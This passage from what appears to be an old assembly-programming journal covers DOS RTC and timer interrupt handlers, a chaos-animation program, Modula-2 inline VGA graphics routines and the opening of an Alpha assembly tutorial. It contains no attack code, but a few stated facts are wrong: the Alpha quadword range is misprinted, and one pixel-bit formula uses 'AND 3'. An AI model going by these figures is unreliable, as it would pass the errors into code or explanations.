            dec   ax                       ; are we at correct value?
            jnz   L0                       ; ... if not, wait some more
            or    [Flags], TimeOut         ; ... if so, set TimeOut flag,
            mov   ax, [MaxCount]           ; ... reload time constant
register
            jmp   L0

   ---- End ------------------------------------------- NewIRQ8 --------

I like to do as little as possible in this kind of routines. In this
case I set a flag and rely on the abillities of the background program
to fork execution based on the state of that flag.

I hate the idea of having an INT routine that actually DOES things, but
which, for some obscure reason, cannot complete before the next INT
comes in. You'll be able to figure out what will happen in most cases.

If this routine sets a flag twice, I don't care too much. OK, I loose a
sample, but the program keeps running and it will still terminate when I
ask it to.

This routine:

   - saves registers on the user-stack
   - restores correct DS
   - accesses the FLAGS register in memory
   - consults these flags and acts upon them
   - eventually reaches L1 and here an EOI is sent to the PIC's
   - pops the stored registers from the userstack
   - returns with an IRET.

The PIC needs an EOI to enable lower priority interrupts. And since
there are two PIC's in modern PC's, there also must be two EOI's.

The following routine will enable the new IRQ8 handler:

   --- Begin ----------------------------------- EnableNewIRQ8 ---------

   EnableNewIRQ8:                  ; program the RTC chip to 1 kSps
            push  ax               ; and enable the 8259 PIC, channel 8
            mov   al, 0C
            out   070, al
            in    al, 071          ; check register C first
            mov   ah, 00100110xB
            call  SetPIRate        ; set PI rate to 1 kSps
            mov   al, 0B
            out   070, al
            mov   al, 01000010xB   ; enable the RTC interrupt pin
            out   071, al          ; and store it in RTC register B
            call  EnableIRQ8       ; enable the 8259 PIController
            pop   ax
            ret

   ---- End ------------------------------------ EnableNewIRQ8 ---------

And before going back to the OS of your choice, make sure there will be
no IRQ8's anymore coming this way:

   --- Begin ----------------------------------- ResetNewIRQ8 ----------

   ResetNewIRQ8:                   ; restore default values in RTC
            push  ax               ; and disable 8259 PIC, channel 8
            mov   al, 0A
            out   070, al          ; select register A
            mov   al, 00100110xB
            out   071, al          ; and set it back to PC default
            mov   al, 0B
            out   070, al
            mov   al, 00000010xB   ; disable interruptions from RTC chip
            out   071, al          ; via register B
            call  DisableIRQ8      ; handle the PIC
            pop   ax
            ret

   ---- End ------------------------------------ ResetNewIRQ8 ----------

In the big program these code fragments are from, I use two timer
interrupts:

   - the RTC timer is used for trigger-timing. When the RTC has set the
     right flag, the main program will sample the ADC and store the
     result in a buffer for later processing.

   - the internal PC klok which generates the 55 ms timing signals is
     used to set another flag. When this is set, the (DMM style) display
     is updated. The digital readout is updated about 3 times per second
     and the bargraph display is updated 18 times per second.

Therefore I also need a new IRQ0 handler:

   ---------------------------------------------------- NewIRQ0 --------

   L0:      pop   ds                       ; restore register
            jmp   [cs:OldIRQ0]             ; and update DOS clock

   NewIRQ0: push  ds                       ; new timer routine (18,2 Hz)
         cs mov   ds, [DataSeg]            ; restore DS
            test  [Flags], Running
            jz    L0                       ; if not running, eject!
            inc   [Counter]                ; else increment counter,
            or    [Flags], RefrshBar       ;  indicate "bargraph refresh"
            test  [Counter], 07            ; twice per second,
            IF  Z or  [Flags], RefrshDig   ;  indicate "digits update"
            jmp   L0                       ; and get out

   ---------------------------------------------------- NewIRQ0 --------

This new routine does the following:

   - check if the DMM is running,
   - if not, it makes no sense to set any flags,
   -   if running, set the "update bargraph display" flag,
   -   if running, check if it is time to update the digital readout,
   - restore DS register,
   - branch to previous IRQ0 handler.

In the initialisation routine, common to all my programs, I make sure
the right interrupt vectors are stolen:

   --- Begin ------------------------------------------ Init -----------

   init:    call  SetVars          ; init most import variables
            call  PowDown          ; make sure ADC is OFF
            call  ClkLo            ; prepare ADC for power-up
            call  ChkTime          ; measure minimum sample time
            call  MaxSps           ; determine maximum sample speed

            mov   ah, 0F
            int   010              ; determine existing video mode
            mov   [VidMode], al    ; store it
            mov   ax, 012
            int   010              ; set 640 x 480 graphics mode
            push  es
            mov   ax, 0351C        ; get old timervector
            int   021
            mov   w [OldIRQ0], bx
            mov   w [OldIRQ0+2], es
            mov   dx, offset NewIRQ0
            mov   ax, 0251C
            int   021              ; install new TIMER routine
            mov   ax, 03570
            int   021
            mov   w [OldClock], bx
            mov   w [OldClock+2], es
            mov   dx, offset NewIRQ8
            mov   ax, 02570
            int   021              ; install NewIRQ8 routine
            call  EnableNewIRQ8    ; and get it to work
            pop   es
            mov   ax, 0
            int   033              ; init mouse
            ShowMouse              ; this is a macro....

            call  FillScreen
            or    [Flags], RfrshBar + RefrPara + Upd8Digs
            call  ShowDig
            call  BrScale
            call  Update
            ret

   ---- End ------------------------------------------- Init -----------

Not much to explain about this INIT routine I guess.

So, on to the EXIT part of the software. Forget this, and the computer
will hang on random times afterwards....

   --- Begin ------------------------------------------ Exit -----------

   exit:    call  PowDown
            call  ResetNewIRQ8
            push  ds
            lds   dx, [OldIRQ0]
            mov   ax, 0251C
            int   021              ; restore timer vector
            pop   ds
            push  ds
            lds   dx, [OldClock]
            mov   ax, 02570
            int   021              ; restore realtime clock vector
            pop   ds

            mov   ah, 0
            mov   al, [VidMode]
            int   010              ; back to previous screenmode
            mov   ax, 0
            int   033              ; reset mouse and -driver
            mov   ax, 04C00
            int   021              ; and exit to DOS

   ---- End ------------------------------------------- Exit -----------

That's all you need to know to get started. The RTC chip has some nice
other possibillities. It can be programmed to interrupt each second. Or
any other number of seconds. It is a truly versatile chip with many
timing functions directly available to systems level programmers.

It might be a good idea to seacrh the web for a datasheet. A good
starting point will be www.dalsemi.com where PDF files will be available
for all DS 1287 style chips. Or else from ftp.dalsemi.com. The latest
versions of this chip that I know of is the DS 17887. This has a Y2K
compliant clock and over 8K of NV (=Non Volatile) RAM.

In the USA Dallas have an Automatic Datasheet FaxBack number:

         972 - 371 4441

Have fun exploiting the RTC chip, but be prepared to hit the reset
button now and then. Also, make a backup of the CMOS battery-backup RAM
onto a floppy disk! You'll have corrupted or erased these data before
you know it and it's always a bit of a shock if the system cannot even
find the C: drive anymore....



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                               Chaos
Animation
                                                               by Laura
Fairhead


     To assemble this program you are going to require most of the library
routines I have so far presented here. You can consider this an example
in just how easy it is to write software in assembler if you continue
to build and refine a library system. The program probably took me about
half an hour of work and most of that was making myself satisfied with
the niceness of the code:-


;issue #5
INCLUDE NUCONV.ASM


;issue #6
INCLUDE SCANU.ASM

;issue #7
;scalst list scanner
INCLUDE SCAWS.ASM

;random number generator
INCLUDE RAND.ASM

;ASM building blocks
INCLUDE PSTR.ASM
INCLUDE PSTRCR.ASM
INCLUDE PSTRCX.ASM
INCLUDE OUTCR.ASM
INCLUDE STRLEN.ASM
INCLUDE PUTCH.ASM


Overview
~~~~~~~~
     This is a simple but endearing graphical animation minature that
is based on the iterative function:-

     x' = x*x + y + a

     y' = b - x

     Where a,b are constants, x,y are old coordinates and x',y' are the
new ones. All values are taken to be in [0,1). That is the operations
are all performed modulo 1.

     If you haven't covered this in mathematics yet it is quite simple,
your function mod1 would be:-

     mod1(x) = x - int(x)

     This can all be done nicely within the bounds of 32-bit values,
simply view the binary point as being just before the MSbit.

     We only really have 4 values to keep since x',y' are the next x,y.

kaa     EQU kaera+1
kab     EQU kaa+4
kax     EQU kab+4
kay     EQU kax+4

     The EQU's at the program end are defining offsets for uninitialised
data that lies in the primary code segment. Here we have kaa<->a, kab<->b,
kax<->x, kay<->y

;EAX=x
         MOV EAX,DWORD PTR DS:[kax]
;EBX=b
         MOV EBX,DWORD PTR DS:[kab]
;EBX=b-x =y'
         SUB EBX,EAX
;ECX=y' for later use
         MOV ECX,EBX
;EBX=y, y'->y  (didn't I say XCHG is useful!)
         XCHG EBX,DWORD PTR DS:[kay]
;EBX=y+a
         ADD EBX,DWORD PTR DS:[kaa]
;EDX:EAX=x*x
;high dword is the first 32 b.p's....
         MUL EAX
;EBX=x*x+y+a =x'  (how much of the pattern is due to loss of accuracy here?)
         ADD EBX,EDX
;x<-x'
         MOV DWORD PTR DS:[kax],EBX

     Reasonably efficient, and we come out with the x,y coordinate pair
also in EBX,ECX.

     To jazz things up a little, instead of the basic idea:-
         (i)   set some random x,y,a,b
         (ii)  do our function on the x,y,a,b
         (iii) plot point on the screen representing x,y
         (iv)  go back to (ii)

     We implement a "trail". This is basically where we keep a store of
the last so many points drawn  (remember that classic WORM game??).
Then one end is added to and the other is deleted from. Points are all
plotted with XOR, especially since doing a second XOR will erase a
plotted point (so there is no erase routine).

     Furthermore for every point, 4-reflections of the point are plotted
to the screen. This gives you symmetry for free.


The plot routine
~~~~~~~~~~~~~~~~
     I'm going to first explain the plot routine before going into the
main code body. I had some fun writing it, but it also illustrates some
important points.

     We are using mode 011h. This is 640x480x2, ( 0280hx01E0h )

     With mode 011h you have of course only the one plane. You've got
bytes from +00h to +04Fh on each row representing 8-bit pixel groups.

     So given an x coordinate you need to take the 2 parts:-

         offset =x SHR 3
         bit    =x AND 3

     The y coordinate is just the one part, the offset:-

         offset =y *050h           (row=050h bytes)

     Now of course it is plain to see that the offset is simply the result
of multiplication by 5 and then shift left 4. (unless you work always in
decimal, ala 050h=5*010h)

     Oh, I LOVE the x86:-

         LEA SI,[EDX*4+EDX]

     This puts DX*5 straight into SI. Thats about 5 operations all in one
go:)

     So then SI is shifted 4 left and the resultant offset y*050h is the y
component of the offset on screen of the pixel we want to plot.

     The routine keeps the x/y components apart because we want to plot
(x,y) (-x,y) (-x,-y) (x,-y). And as soon as they are put together for
one they need to be disassembled/reconstructed for the next.

     The x component, which is always in BX, is obviously created with
a shift right 3, however we first have to rescue the least significant
3 bits. They give the bit in the byte.

         MOV CL,BL
         MOV AX,0180h
         ROR AL,CL;ROL AH,CL

     Here I am getting AL with the bit set that corresponds to the the pixel
on screen. AH is being set up the opposite way around. Think of the screen
as four quadrants:-

                     |
              x+     |    x-
                 y+  |
                     |
          -----------+-------------
                     |
                     |
                 y-  |
                     |
                     |

     If our point starts in the x+y+ quadrant, we have the values to
draw that:-

       ( SHR BX,3  )

         XOR [SI+BX],AL

     Now to reflect the point x-wise, so it goes to x-y+, you only need
to get the x offset = 04Fh-x. Well x86 lets you do powerful things,
we don't need to mess; just negate BX to get the -x and add the 04Fh
in as a displacement. Of course the bit offset gets negated as well,
which is exactly why we have the two opposite masks in AL/AH:-

         NEG BX;XOR [SI+BX+04Fh],AH

     Next y is reflected, so we go to -x-y. This is the same thing
again, only the y coordinate will only affect the offset:-

         NEG SI;XOR [SI+BX+04Fh+01DFh*050h],AH

     And finally to +x-y:

         NEG BX;XOR [SI+BX+01DFh*050h],AL


Notes
~~~~~
     During the program run you can press any key to set different values
for the chaos function. Press ESC to abort. On abortion a message will
give you 2 hex d-words, these are the random number seed that generated
the last pattern you were watching. To see it again simply record the
values and invoke the program with the values on the command line:-

(ESC abort)

random seed=01234567 FEDCBA98      (program output)

KAOS 01234567 FEDCBA98             (invoke program with seed as parameter)

(chaos pattern displayed is the same as the one broken out of)

     The code is left undelayed and as such it may run too fast on a fast
machine. The optimum speed is for it to be only slighty over-fast. If
you want to achieve this you should add some sort of delay loop in. Alt-
ernatively just get out your old 386 and give it some work to do.

     Code is, as usual, is MASM format. Assemble to a COM file.

========START OF CODE======================================================

OPTION SCOPED
OPTION SEGMENT:USE16
.486

stksiz      EQU 0400h       ;stack size

kadatx      EQU 0C00h       ;#points length of trail

cseg SEGMENT BYTE

ASSUME NOTHING
ORG 0100h

kode PROC NEAR

;initialise, allocate memory and stack
         CLD
         MOV AH,04Ah
         MOV BX,OFFSET endof+0Fh
         SHR BX,4
         INT 021h
         JC errmem
         MOV SP,OFFSET stk+stksiz
;zero-terminate command line to facilitate
;parsing
         MOV SI,080h
         LODSB
         CBW
         XCHG BX,AX
         MOV [BX+SI],BH

;any parameters given?
         CALL NEAR PTR scaws
         CMP AL,0
         JZ SHORT ko0

;yes, so read 2 dwords as random seed
         MOV DI,OFFSET rndn
         MOV AL,010h
         CALL NEAR PTR scanur
         CALL NEAR PTR scanu
         JNA erripa
         STOSD
         CALL NEAR PTR scaws
         CALL NEAR PTR scanu
         JNA erripa
         STOSD
         JMP SHORT ko1

;no, so set random seed from system time
ko0:    CALL NEAR PTR rndseed
ko1:


lop2:

;set mode 011h, fade grey background
         MOV AX,011h
         INT 010h
         MOV EAX,040404h
         MOV BL,0
         CALL NEAR PTR spal

;save random seed so that kaos params can be restored
;by user
         MOV SI,OFFSET rndn
         MOV DI,OFFSET seed
         MOVSD;MOVSD

;set random params for function
         MOV DI,OFFSET kaa
         MOV CX,4
         lop1:
         CALL NEAR PTR rndgen32
         STOSD
         LOOP lop1

;initialise for plot trail
;   [kaera]=0 on the first pass of the store
;   [kaera]=-1 thereafter
;   [kaoff]=offset of store pointer

         MOV BYTE PTR DS:[kaera],0
         MOV WORD PTR DS:[kaoff],OFFSET kadat

lop0:

;iterate x,y
;   x'=x*x+y+a
;   y'=b-x
         MOV EAX,DWORD PTR DS:[kax]
         MOV EBX,DWORD PTR DS:[kab]
         SUB EBX,EAX
         MOV ECX,EBX
         XCHG EBX,DWORD PTR DS:[kay]
         ADD EBX,DWORD PTR DS:[kaa]
         MUL EAX
         ADD EBX,EDX
         MOV DWORD PTR DS:[kax],EBX

;x,y scale to screen bounds
;  gets the x,y [0,1) values into screen coordinate pair (BX,DX)
         SHR EBX,12
         LEA EBX,[EBX*4+EBX]
         SHR EBX,13

         MOV EDX,ECX
         SHR ECX,4
         SUB EDX,ECX
         SHR EDX,23

;do point
;  [kaera] is -1 on and after the store had become full for the first
;          time
         MOV DI,WORD PTR DS:[kaoff]
         TEST BYTE PTR DS:[kaera],-1
         JZ SHORT ko3
;unplot trail end point
         PUSH BX
         PUSH DX
         MOV BX,[DI]
         MOV DX,[DI+2]
         CALL NEAR PTR plo4
         POP DX
         POP BX

;current position is saved in store
ko3:    MOV AX,BX
         STOSW
         MOV AX,DX
         STOSW
;store ptr incremented wrapping at the end
         CMP DI,OFFSET kadat+kadatx*4
         JNZ SHORT ko4
         MOV DI,OFFSET kadat
         OR BYTE PTR DS:[kaera],-1

ko4:    MOV WORD PTR DS:[kaoff],DI

;current position is plotted
         CALL NEAR PTR plo4

;user
;  ESC aborts, any key sets a new function going
         MOV AH,0Bh
         INT 021h
         CMP AL,0
         JZ lop0

         MOV AH,7
         INT 021h
         CMP AL,01Bh
         JNZ lop2

;display random seed value and terminate
         MOV SI,OFFSET t0
         CALL NEAR PTR pstr
         MOV EAX,02083010h
         CALL NEAR PTR nuconvs
         MOV SI,OFFSET seed

;those instructions at the program start are never going to be
;executed again so use them as a temp workspace instead of kadat
;which could possibly be dangerous if somebody EQU's kadatx to
;some low value
         MOV DI,0100h
         PUSH DI
         LODSD
         CALL NEAR PTR nuconv
         MOV AL,020h
         STOSB
         LODSD
         CALL NEAR PTR nuconv
         MOV AL,0
         STOSB
         POP SI
         CALL NEAR PTR pstrcr

;screen mode is not put back to 02h you may wish to add
;a MOV AX,2;INT 010h here however I left it out because I
;see way too much of that mode

;program termination
terminat0:
         MOV AL,0
terminat:
         MOV AH,04Ch
         INT 021h

;error aborts
erripa:
         MOV SI,OFFSET terripa
         MOV AL,2
         JMP SHORT err
errmem:
         MOV SI,OFFSET terrmem
         MOV AL,1
err:
         PUSH SI
         MOV SI,OFFSET terr
         CALL NEAR PTR pstr
         POP SI
         CALL NEAR PTR pstrcr
         JMP terminat

terr:   DB "ERROR: ",0
terrmem:
         DB "memory allocation failure",0
terripa:
         DB "invalid parameter format",0

;program text (in it's entirely)
t0:     DB "random seed=",0

kode ENDP

;plo4-    4-way plot routine for mode 011h
;
;         plots 4 reflections of a single point on the mode 011h
;         screen these are (x,y) (-x,y) (-x,-y) (x,-y)
;
;         plots using XOR
;
;entry:   BX,DX=x,y coordinates
;
;exit:    SI,CL,AX,BX destroyed

plo4 PROC NEAR

         PUSH DS

;screen segment 0A000h
; for further comment please refer above
         PUSH 0A000h
         POP DS
         LEA SI,[EDX*4+EDX]
         SHL SI,4
         MOV CL,BL
         MOV AX,0180h
         ROR AL,CL
         ROL AH,CL
         SHR BX,3
         XOR [SI+BX],AL
         NEG BX
         XOR [SI+BX+04Fh],AH
         NEG SI
         XOR [SI+BX+04Fh+01DFh*050h],AH
         NEG BX
         XOR [SI+BX+01DFh*050h],AL
         POP DS
         RET

plo4 ENDP

;if you don't like my fade grey background you can delete this and
;the line that invokes it. However this is also the next library
;routine, so do cut/paste it into a file it will be used in future
;articles.

;spal-  set VGA DAC register via hardware
;entry: EAX=XXGGBBRR  (hex of course)
;
;           RR=red component
;           BB=blue component
;           GG=green component
;
;       don't forget that these values are <=03Fh
;
;       BL=DAC register to set
;
;
;exit:  (all registers are preserved)

spal PROC NEAR

;the code here is straightforward so I shall add no comment apart
;from a small moan:( I have used direct hardware access instead
;of the BIOS calls to affect the palette since square one, I'm
;not unreasonable in my desire to program the hard-metal of the machine,
;however the quality of the BIOS graphics routines is absolutely
;despicable. If you've ever tried using them you will know what I'm
;talking about.
;
         PUSH EAX
         PUSH DX
         MOV DX,03C8h
         CLI
         XCHG BX,AX
         OUT DX,AL
         INC DX
         XCHG BX,AX
         OUT DX,AL
         SHR EAX,8
         OUT DX,AL
         SHR EAX,8
         OUT DX,AL
         STI
         POP DX
         POP EAX
         RET

spal ENDP

;library routines
         INCLUDE RAND.ASM
         INCLUDE SCAWS.ASM
         INCLUDE SCANU.ASM
         INCLUDE NUCONV.ASM

         INCLUDE PSTR.ASM
         INCLUDE PSTRCR.ASM
         INCLUDE PSTRCX.ASM
         INCLUDE OUTCR.ASM
         INCLUDE STRLEN.ASM
         INCLUDE PUTCH.ASM
;data

kaoff   EQU $                   ;(w)  offset of trail store pointer
(absolute)
kaera   EQU kaoff+2             ;(b)  flag indicating 1st trail pass
kaa     EQU kaera+1             ;(dw) a
kab     EQU kaa+4               ;(dw) b   kaos function parameters
kax     EQU kab+4               ;(dw) x
kay     EQU kax+4               ;(dw) y
kadat   EQU kay+4               ;(*)  store space for trail data
seed    EQU kadat+kadatx*4      ;(qw) copy of initial random number seed
stk     EQU seed+8              ;(*)  stack space
endof   EQU stk+stksiz          ;[endofprogram]

cseg ENDS

END FAR PTR kode

========END OF CODE========================================================














::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    Inline Assembler With
Modula
                                                    by Jan Verhoeven


I don't want to start a compiler-war in the assembler programmer's journal,
but I do want to show some nice in-line assembly routines for FST Modula-2.
FST (or Fitted Software Tools) was a shareware Modula-2 compile made by
Roger
Carvalho. He eventualy gave up the concept of shareware and made his final
version freeware. If you look carefully you can find this package in many
software repositories like Simtel. Also the FreeDOS website used to harbor
this final version.

For this Modula-2 compiler I used my VGA routines (see previous issues) and
some in-line assembly to give this compiler a way to do graphics modes.

I uploaded the full sources to SimTel some months (or years?) ago, so if you
would like to have a detailed look at it, go there and look for it.

Modula-2 is despised by many, but it is the most structured language ever
made. And that's also probably the reason why most coders refuse to use it.
You must follow the compiler, whatever you do. A high price, but the result
is
that Modula-2 programs seldomly crash. They can bail-out in the middle of
the
program, but they will not hang due to a pointer or indexing error.

Anyway, here's my addition to this marvelous language:

---------------------------------------------------------------------------
IMPLEMENTATION MODULE VgaLib;

PROCEDURE   SHL (x, y : CARDINAL) : CARDINAL;       (*  Shift left x, y
bits.  *)

VAR result  : CARDINAL;

BEGIN
     ASM
         MOV  AX, x
         MOV  CX, y
         AND  CX, 15         (* Mask off lower nybble    *)
         JCXZ ok             (* Get out if no shift.     *)
         SHL  AX, CL
     ok: MOV  result, AX     (* Store result.    *)
     END;
     RETURN result;
END SHL;

---------------------------------------------------------------------------

The only "drawback" is that the in-line code must be 8088 style. So you
won't
be eable to use MMX instructions, but almost no-one ever needs those.

FST Modula-2 offers direct access to (values of) variables. Neat. Makes the
in-line feature very convenient to use.

---------------------------------------------------------------------------

PROCEDURE   SetColour (Colour : CHAR);  (*  Define colour to work with.
*)

BEGIN
     ASM
         MOV  DX, 03C4H          (* VGA controller port  *)
         MOV  AH, Colour
         MOV  AL, 2
         OUT  DX, AX
     END;
END SetColour;
---------------------------------------------------------------------------

Compare the following routine with the one I entered for the VGA-12h code in
A86 assembly language format. There's some Modula-2 overhead, but the actual
plotting is done in ASM, for speed-reasons.

---------------------------------------------------------------------------
PROCEDURE   Plot (VAR InWin : WinData);     (*  Plot point on CurX, CurY. *)

VAR x, y    : CARDINAL;

BEGIN
     x := InWin.CurX + InWin.TopX;
     y := InWin.CurY + InWin.TopY;

     ASM
         MOV  AX, 0A000H
         MOV  ES, AX         (* Set up segment register *)
         MOV  CX, x
         AND  CX, 7          (* Which bit to plot? *)
         MOV  AH, 80H
         SHR  AH, CL         (* Compose plotting mask *)
         MOV  AL, 8
         MOV  DX, 03CEH
         OUT  DX, AX         (* Set plottingmask *)
         MOV  AX, y          (* Calculate offset in Video RAM *)
         MOV  BX, AX
         ADD  AX, AX
         ADD  AX, AX
         ADD  AX, BX         (* AX := 5 * Y *)
         MOV  CL, 4
         SHL  AX, CL         (* AX := 16 * 5 * Y *)
         MOV  BX, x
         SHR  BX, 1
         SHR  BX, 1
         SHR  BX, 1
         ADD  BX, AX         (* plus X / 8 *)
         MOV  AL, ES:[BX]
         MOV  AL, 0FFH
         MOV  ES:[BX], AL    (* and plot it *)
     END;
END Plot;


PROCEDURE   DrawH (VAR InWin : WinData; Flag : BOOLEAN);
     (*  Draw a horizontal line from CurX, CurY for DeltaX pixels. *)

VAR Index, Stop, x, dx, y, Kval             : CARDINAL;
     Emask, Lmask, Val                       : CHAR;

BEGIN
     IF Flag THEN        (* Flag = TRUE => Plot, else UnPlot *)
         Val := 0FFX;
     ELSE
         Val := 0X;
     END;
     IF InWin.DeltaX < 18 THEN
         FOR Index := 0 TO InWin.DeltaX DO       (* For short lines *)
             Plot (InWin);
             INC (InWin.CurX);
         END;
     ELSE
          x := InWin.TopX + InWin.CurX;          (* For long lines *)
          y := InWin.TopY + InWin.CurY;
         dx := InWin.DeltaX;
         ASM
             MOV  AX, 0A000H
             MOV  ES, AX         (* Set up segment register *)
             MOV  CX, x
             AND  CX, 7
             MOV  BX, 8
             SUB  BX, CX
             MOV  AL, 0FFH
             SHR  AL, CL
             MOV  Emask, AL      (* compose plotting mask *)
             MOV  CX, dx
             SUB  CX, BX
             MOV  AX, CX
             AND  AX, 7
             PUSH AX             (* Save L-val *)
             SUB  CX, AX
             SHR  CX, 1
             SHR  CX, 1
             SHR  CX, 1
             MOV  Kval, CX
             MOV  AL, 0
             POP  CX             (* retrieve L-val *)
             JCXZ L0
             MOV  AL, 080H
         L0: DEC  CX
             SAR  AL, CL
             MOV  Lmask, AL

             MOV  AX, y              (* Calculate offset in Video RAM *)
             MOV  BX, AX
             ADD  AX, AX
             ADD  AX, AX
             ADD  AX, BX             (* AX := 5 * Y *)
             MOV  CL, 4
             SHL  AX, CL             (* AX := 16 * 5 * Y *)
             MOV  BX, x
             SHR  BX, 1
             SHR  BX, 1
             SHR  BX, 1
             ADD  BX, AX             (* plus X / 8 *)

             MOV  AH, Emask
             MOV  DX, 03CEH
             MOV  AL, 8
             OUT  DX, AX             (* Set plotting mask *)

             MOV  AL, Val
             MOV  AH, ES:[BX]
             MOV  ES:[BX], AL        (* Do the plotting ... *)

             INC  BX
             MOV  CX, Kval
             JCXZ L2
             MOV  AX, 0FF08H
             OUT  DX, AX
             MOV  AH, Val
         L1: MOV  AL, ES:[BX]
             MOV  ES:[BX], AH
             INC  BX
             LOOP L1
         L2: MOV  AH, Lmask
             MOV  AL, 8
             OUT  DX, AX
             MOV  AL, ES:[BX]
             MOV  AL, Val
             MOV  ES:[BX], AL
         END;
         INC (InWin.CurX, dx);
     END;
END DrawH;


PROCEDURE   PlotChar (VAR InWin : WinData; Letter : CHAR);
             (*  Plot character on InWin.(CurX,CurY).    *)

VAR xpos, ypos, MapOfs, VGApos, VGAseg, Pmask       : CARDINAL;
     Cval                                            : CHAR;

BEGIN
     IF Letter = 0AX THEN
         INC (InWin.CurY, 16);           (* Process LF *)
         RETURN;
     END;
     IF Letter = 0DX THEN
         InWin.CurX := InWin.Indent;     (* Process CR *)
         RETURN;
     END;
     IF InWin.CurX >= InWin.Width - ChrWid THEN
         InWin.CurX := InWin.Indent;
         INC (InWin.CurY, 16);
     END;
     xpos := InWin.CurX + InWin.TopX;
     ypos := InWin.CurY + InWin.TopY;
     VGApos := 80 * ypos + SHR (xpos, 3);
     VGAseg := 0A000H;
     MapOfs := ORD (Letter) * 16;
     ASM
         PUSH ES             (* save ES *)
         MOV  CX, xpos
         AND  CX, 7
         MOV  Cval, CL       (* nr of bits "off center" *)
         MOV  BX, 0FF00H
         SHR  BX, CL
         MOV  Pmask, BX      (* mask to use for left and right halves *)
         MOV  AX, BX
         MOV  AL, 8
         MOV  DX, 03CEH
         OUT  DX, AX         (* set plotting mask for left part *)
         MOV  CX, 16
         MOV  BX, VGApos
         LES  SI, BitMap     (* here are the pixels that make the tokens *)
         ADD  SI, MapOfs
     L0: PUSH CX
         LES  AX, BitMap     (* load ES, AX is just scrap *)
         MOV  AH, ES:[SI]    (* load pattern *)
         MOV  CL, Cval
         SHR  AX, CL         (* compose left half *)
         MOV  ES, VGAseg
         MOV  AL, ES:[BX]
         MOV  ES:[BX], AH    (* and "print" it *)
         ADD  BX, 80         (* point to next row *)
         INC  SI             (* and next pixel pattern *)
         POP  CX
         LOOP L0             (* repeat until done *)
         MOV  AX, Pmask
         CMP  AL, 0          (* if Cval = 0 => perfect allignment *)
         JE   ex             (*   skip second half *)
         XCHG AH, AL         (* else repeat the story once more *)
         MOV  AL, 8
         OUT  DX, AX         (* set up mask for right half *)
         MOV  CX, 16
         SUB  BX, 1279       (* 16 x 80 - 1 *)
         SUB  SI, CX
     L1: PUSH CX
         LES  AX, BitMap
         MOV  AH, ES:[SI]
         MOV  AL, 0
         MOV  CL, Cval
         SHR  AX, CL
         MOV  ES, VGAseg
         MOV  AH, ES:[BX]
         MOV  ES:[BX], AL
         ADD  BX, 80
         INC  SI
         POP  CX
         LOOP L1
     ex: POP  ES
     END;
     INC (InWin.CurX, ChrWid);   (* point to next printing position *)
END PlotChar;
---------------------------------------------------------------------------

And here is the promised solution for the "make a box-drawing routine"
problem
of the previous issue. OK, the solution is in Modula-2, but since this is
such
a clear to understand language it will be no big deal to port this code to
assembly language format.

---------------------------------------------------------------------------
PROCEDURE   MakeBox (InWin : WinData);
             (*  Make a box on screen starting at (TopX, TopY).  *)
BEGIN
     InWin.CurX := 0;
     InWin.CurY := 0;                        (* Make sure pointers are
correct *)
     InWin.DeltaX := InWin.Width - 1;
     InWin.DeltaY := InWin.Height - 1;       (* setup parameters for drawing
lines *)
     SetColour (InWin.BoxCol);
     DrawH (InWin, TRUE);                    (* draw horizontal line *)
     DrawV (InWin);                          (* draw vertical line   *)
     InWin.CurX := 0;
     InWin.CurY := 1;                        (* adjust coordinates   *)
     DrawV (InWin);                          (* draw last vertical line  *)
     DEC (InWin.CurY);
     INC (InWin.CurX);                       (* adjust coordinates once more
*)
     DrawH (InWin, TRUE);                    (* draw final line  *)
END MakeBox;

END VgaLib.
---------------------------------------------------------------------------











::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                  Assembly on the Alpha
Platform
                                                  by Rudolf Seemann


ASSEMBLING ON ALPHA PART I
--------------------------
In this first article I will discover how to use functions written in alpha
assembler in a program written in C. The example I give is a rather simple
one. There are many things to know about alpha. This text shows that it is
quite simple to use assembler on alpha.

Introduction
------------
The heart of the alpha architecture is a 64-bit RISC processor with 32
integer
($0 to $31) and 32 floating point registers ($f0 to $f31). Its operation
codes
can be classified by the number of its operands:
   class     opcode
   operate   opcode Ra,Rb,Rc     # Ra operation Rb -> Rc
             opcode Ra,number,Rc # Ra operation number (0-255) -> Rc
   memory    opcode Ra,Disp(Rb)  # load/store contents saved in memory
address
                                 # Rb + offset Disp in register Ra
   branch    opcode Ra,label     # branch if Ra = true to label
   PAL       opcode number       # opcodes for the operating system

The Usage Convention of register is listed in the following table. Saved
Registers are such whose contents will not be lost if a function is called.
The function will save such registers if it uses them.

   int reg      Usage Convention           Saved
   ---------------------------------------------
   $0           Integer function result    No
   $1-$8        Conventional scratch regs  No
   $9-$14       General uses               Yes
   $15 or $fp   Frame pointer              Yes
   $16-$21      Integer arguments by value No
   $22-$25      Conventional scratch regs  No
   $26          Return address register    Yes
   $27          Procedure value (pointer)  No
   $28 or $at   reserved for system        No
   $29 or $gp   Global pointer             No
   $30 or $sp   Stack pointer              Yes
   $31          Zero (not modifiable)      n/a

   float reg    Usage Convention                Saved
   --------------------------------------------------
   $f0          floating point function result  No
   $f1          Imaginary part function result  No
   $f2-$f9      General uses                    Yes
   $f10-$f15    Conventional scratch regs       No
   $f16-$f21    Floating point args by value    No
   $f22-$f30    Conventional scratch regs       No
   $f31         Zero (not modifiable)           n/a

Data Types are specified by suffixes (like q for quadword, l for longword).
Most integer operations only know these two suffixes. Floating point
operations
know both: s and t.

Integer Data types:
   Type         Bits         signed range          unsigned range
   ---------------------------------------------------------------------
   Byte         8            -128 to 127           0 to 255
   Word         16           -32768 to 32767       0 to 65535
   Longword     32           -2147483648 to        0 to 4294967295
                              2147483647
   Quadword     64           -9228372036854775808  0 to
                              9228372036854775807  18446744073709551615

Floating Point Data Types:
   Type         Magnitude                         Precision
   ----------------------------------------------------------------
   S-floating   1.175 x 10^-38 to 3.403 x 10^38    6 decimal digits
   T-floating   2.225 x 10^-308 to 1.798 x 10^308  15 decimal digits

If you want to use 64-bit numbers in the c-programming language (gcc), use
(long) or (long int). (int) is 32 bits long.

The following example was tested on an SX164 with SuSE Alpha Linux 6.3
